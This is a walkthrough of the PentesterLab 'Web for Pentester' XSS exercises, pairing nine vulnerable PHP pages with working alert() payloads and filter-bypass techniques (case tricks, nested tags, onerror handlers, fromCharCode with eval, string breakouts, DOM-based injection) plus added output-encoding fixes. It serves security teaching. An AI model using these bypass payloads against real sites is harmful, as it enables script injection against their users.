PentesterLab -- Web for Pentester - XSS

Web for Pentester: This exercise is a set of the most common web vulnerabilities

Difficulty: 1/5

Example 1

code review:

example1.php
<?php require_once '../header.php'; ?>
<html>
Hello 
<?php
  echo $_GET["name"];
?>

<?php require_once '../footer.php'; ?>

The vulnerability exists because the name parameter is echoed straight into the HTML body with no validation and no output encoding.

exploit:

http://192.168.79.162/xss/example1.php?name=<script>alert("xss")</script>

Example 2

code review:

example2.php
<?php require_once '../header.php'; ?>
Hello 
<?php
  
  $name =  $_GET["name"];
  $name = preg_replace("/<script>/","", $name);
  $name = preg_replace("/<\/script>/","", $name);
echo $name;
?>
<?php require_once '../footer.php'; ?>

In the code above, the developer strips the literal strings <script> and </script>. The match is case-sensitive, however, so <Script>alert('xss')</Script> passes through the filter untouched.

exploit:

http://192.168.79.162/xss/example2.php?name=<Script>alert("xss")</Script>

Example 3

code review:

example3.php
<?php require_once '../header.php'; ?>
Hello 
<?php
  
  $name =  $_GET["name"];
  $name = preg_replace("/<script>/i","", $name);
  $name = preg_replace("/<\/script>/i","", $name);
echo $name;
?>

<?php require_once '../footer.php'; ?>

The developer adds the /i flag so the filter matches both lower case and upper case letters. Each preg_replace() runs only once, though, so a nested payload bypasses it: removing the inner <script> from <scr<script>ipt> leaves a complete <script> tag behind.

exploit:

http://192.168.79.162/xss/example3.php?name=<scr<script>ipt>alert("xss")</scr</script>ipt>

Example 4

code review:

example4.php
<?php require_once '../header.php';

if (preg_match('/script/i', $_GET["name"])) {
  die("error");
}
?>

Hello <?php  echo $_GET["name"]; ?>
<?php require_once '../footer.php'; ?>    

The developer now rejects any input containing the string script, regardless of case. XSS does not require a <script> tag, so an <img> tag with an onerror event handler bypasses the check.

exploit:

http://192.168.79.162/xss/example4.php?name=<img src="xx" onerror="alert('xss')"/>

Example 5

code review:

example5.php
<?php require_once '../header.php';

if (preg_match('/alert/i', $_GET["name"])) {
  die("error");
}
?>

Hello <?php  echo $_GET["name"]; ?>
<?php require_once '../footer.php'; ?>    

The developer rejects any input containing the string alert. The call can be rebuilt at runtime with String.fromCharCode and passed to eval(), so the literal word alert never appears in the request.

exploit:

http://192.168.79.162/xss/example5.php?name=<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
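Examples 1 through 5 share one root cause: the value is written into the HTML body, and the developer tries to remove or reject dangerous substrings instead of encoding the output. The following is an added example, not PentesterLab's code, that contrasts the example3.php blacklist with context-aware encoding; the function names and the sample inputs are constructed for this illustration.

```php
<?php
// Added example (not PentesterLab's code): output encoding for the HTML body
// context used by example1.php through example5.php. A blacklist has to
// anticipate every bypass; encoding makes the browser treat the value as text
// no matter what it contains.

declare(strict_types=1);

/**
 * Encode a value for insertion into HTML text or a quoted attribute.
 * ENT_QUOTES encodes both ' and ", ENT_SUBSTITUTE replaces invalid UTF-8
 * instead of returning an empty string, and the charset is stated explicitly.
 */
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Mirror of the filter in example3.php, kept only for comparison. */
function blacklist_filter(string $value): string
{
    $value = preg_replace('/<script>/i', '', $value);
    return preg_replace('/<\/script>/i', '', $value);
}

// Constructed inputs: a benign name that legitimately contains HTML
// metacharacters, and the nested payload used against example3.php.
$inputs = [
    "O'Brien & Sons <3",
    '<scr<script>ipt>alert("xss")</scr</script>ipt>',
];

foreach ($inputs as $input) {
    printf("input:     %s\n", $input);
    // The nested payload survives the blacklist as a complete <script> tag.
    printf("blacklist: %s\n", blacklist_filter($input));
    // The encoded form is displayed literally by the browser, and the benign
    // name is preserved exactly as typed once the browser decodes the entities.
    printf("encoded:   %s\n\n", html_escape($input));
}
```

Run it with php from the command line. In the page itself, the output point in example1.php becomes a single call: echo html_escape($_GET['name'] ?? ''); with no filtering needed beforehand. The blacklist approach is kept only to show what it lets through; a single encoder chosen for the output context replaces all five filters.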

Example 6

code review:

example6.php
<?php require_once '../header.php'; ?>
Hello 
<script>
  var $a= "<?php  echo $_GET["name"]; ?>";
</script>
  <?php require_once '../footer.php'; ?>

The name value is written directly into a JavaScript string inside a <script> block, so we can close the double-quoted string, inject our own statement, and comment out the rest of the line with //.

exploit:

http://192.168.79.162/xss/example6.php?name=";alert("xss");//

Example 7

code review:

example7.php
<?php require_once '../header.php'; ?>
Hello 
<script>
  var $a= '<?php  echo htmlentities($_GET["name"]); ?>';
</script>
  
<?php require_once '../footer.php'; ?>

The developer wraps the value in htmlentities() to encode special characters. With its default flags, however, htmlentities() leaves the single quote ' untouched, so a single quote closes the JavaScript string and // comments out the rest of the line.

exploit:

http://192.168.79.162/xss/example7.php?name=';alert('xss');//
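Examples 6 and 7 place the value inside a JavaScript string literal, which is a different output context from the HTML body, and HTML entity encoding is the wrong encoder for it. The following is an added example, not PentesterLab's code, showing what the default htmlentities() flags leave alone and how to emit a JavaScript string literal with json_encode(); the function name and sample inputs are constructed for this illustration.

```php
<?php
// Added example (not PentesterLab's code): encoding for the JavaScript string
// context used by example6.php and example7.php, where the value lands inside
// var $a = "..." or var $a = '...' in an inline script block.

declare(strict_types=1);

/**
 * Produce a JavaScript string literal (quotes included) that is safe to embed
 * in an inline script. json_encode() handles quoting and backslash escaping;
 * the JSON_HEX_* flags additionally encode < > & ' " as \uXXXX sequences, so
 * the result can never terminate the surrounding script element.
 */
function js_string_literal(string $value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_THROW_ON_ERROR
    );
}

// Constructed inputs: the double-quote and single-quote breakouts from
// examples 6 and 7, plus a value that tries to close the script element itself.
$inputs = [
    '";alert("xss");//',
    "';alert('xss');//",
    '</script><script>alert(1)</script>',
];

foreach ($inputs as $input) {
    // ENT_COMPAT was the htmlentities() default before PHP 8.1: it encodes "
    // but leaves ' alone, which is why example7.php is still exploitable.
    printf("htmlentities ENT_COMPAT: %s\n", htmlentities($input, ENT_COMPAT, 'UTF-8'));
    // ENT_QUOTES closes that gap, but entities are still the wrong encoding
    // for a script context: the browser does not decode them inside <script>.
    printf("htmlentities ENT_QUOTES: %s\n", htmlentities($input, ENT_QUOTES, 'UTF-8'));
    // The JavaScript literal carries the original characters as escapes.
    printf("js_string_literal:       var a = %s;\n\n", js_string_literal($input));
}
```

In the page, the assignment becomes var a = <?php echo js_string_literal($_GET['name'] ?? ''); ?>; with no surrounding quotes, since json_encode() supplies them. Note that since PHP 8.1 the default flags of htmlentities() and htmlspecialchars() include ENT_QUOTES, so the exact behaviour of example7.php depends on the PHP version the lab runs.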

Example 8

code review:

example8.php
<?php
  require_once '../header.php';

  if (isset($_POST["name"])) {
    echo "HELLO ".htmlentities($_POST["name"]);
  }
?>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
  Your name:<input type="text" name="name" />
  <input type="submit" name="submit"/>

<?php

  require_once '../footer.php';

?>

The name parameter is encoded correctly this time, but $_SERVER['PHP_SELF'] is echoed into the form's action attribute without encoding. PHP_SELF includes any extra path information appended after the script name, so the injection point is the request path rather than a parameter.

exploit:

http://192.168.79.162/xss/example8.php/" onmouseover="alert('xss')
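The following is an added example, not PentesterLab's code, showing a safe form action for example8.php. The $_SERVER values are constructed to mirror the request above; the function names are assumptions for this illustration.

```php
<?php
// Added example (not PentesterLab's code): safe form action for example8.php.
// $_SERVER['PHP_SELF'] is SCRIPT_NAME plus any PATH_INFO the client appended
// after the script name, so it is attacker-controlled and must be encoded
// like any other input when placed inside an attribute.

declare(strict_types=1);

/**
 * Return an attribute-safe form action. SCRIPT_NAME holds only the script
 * path, without the trailing PATH_INFO that makes PHP_SELF dangerous; the
 * value is still encoded with ENT_QUOTES because it sits in a quoted attribute.
 */
function form_action(array $server): string
{
    $path = $server['SCRIPT_NAME'] ?? '';
    return htmlspecialchars($path, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** The same encoding applied to PHP_SELF, for pages that must keep using it. */
function encoded_php_self(array $server): string
{
    return htmlspecialchars($server['PHP_SELF'] ?? '', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed $_SERVER values for the request used against example8.php:
// the extra path segment shows up in PATH_INFO and PHP_SELF, not in SCRIPT_NAME.
$server = [
    'SCRIPT_NAME' => '/xss/example8.php',
    'PATH_INFO'   => '/" onmouseover="alert(\'xss\')',
    'PHP_SELF'    => '/xss/example8.php/" onmouseover="alert(\'xss\')',
];

// Preferred: the action never contains the client-supplied path segment.
printf("<form action=\"%s\" method=\"POST\">\n", form_action($server));
// Fallback: PHP_SELF is kept, but the quotes are encoded and cannot break out
// of the attribute, so the event handler is rendered as inert text.
printf("<form action=\"%s\" method=\"POST\">\n", encoded_php_self($server));
```

A form that posts back to the same URL can also simply omit the action attribute, which removes PHP_SELF from the template entirely.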

Example 9

code review:

example9.php
<?php require_once '../header.php'; ?>
<script>
  document.write(location.hash.substring(1));
</script>
<?php require_once '../footer.php'; ?>

The script writes location.hash into the page with document.write(), so everything after # in the URL is parsed as HTML. The fragment never reaches the server, which makes this a DOM-based XSS vulnerability that no server-side filter can catch.

exploit:

http://192.168.79.162/xss/example9.php#<script>alert(1)</script>
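The following is an added example, not PentesterLab's code, rewriting example9.php so the fragment is assigned through a text sink instead of document.write(). It assumes the same header.php and footer.php includes as the exercise; the element id and helper function are constructed for this illustration.

```php
<?php require_once '../header.php'; ?>
<!-- Added example (not PentesterLab's code): example9.php with a text sink.
     The fragment is still user-controlled, but textContent creates a text
     node, so any markup inside it is displayed rather than parsed. -->
<p id="greeting"></p>
<script>
  // Strip the leading '#' and percent-decode the fragment so a name such as
  // "Jos%C3%A9" displays correctly. decodeURIComponent throws on a malformed
  // percent-sequence, so fall back to the raw fragment in that case.
  function fragmentAsText(hash) {
    var raw = hash.substring(1);
    try {
      return decodeURIComponent(raw);
    } catch (e) {
      return raw;
    }
  }

  // textContent is the safe counterpart of document.write/innerHTML here:
  // a fragment containing <script> or <img onerror=...> is shown verbatim.
  document.getElementById('greeting').textContent = fragmentAsText(location.hash);
</script>
<?php require_once '../footer.php'; ?>
```

Because the vulnerable code runs entirely in the browser, the fix has to be made in the script itself; a Content-Security-Policy header that forbids inline script is a useful second layer, but the sink change is the actual remediation.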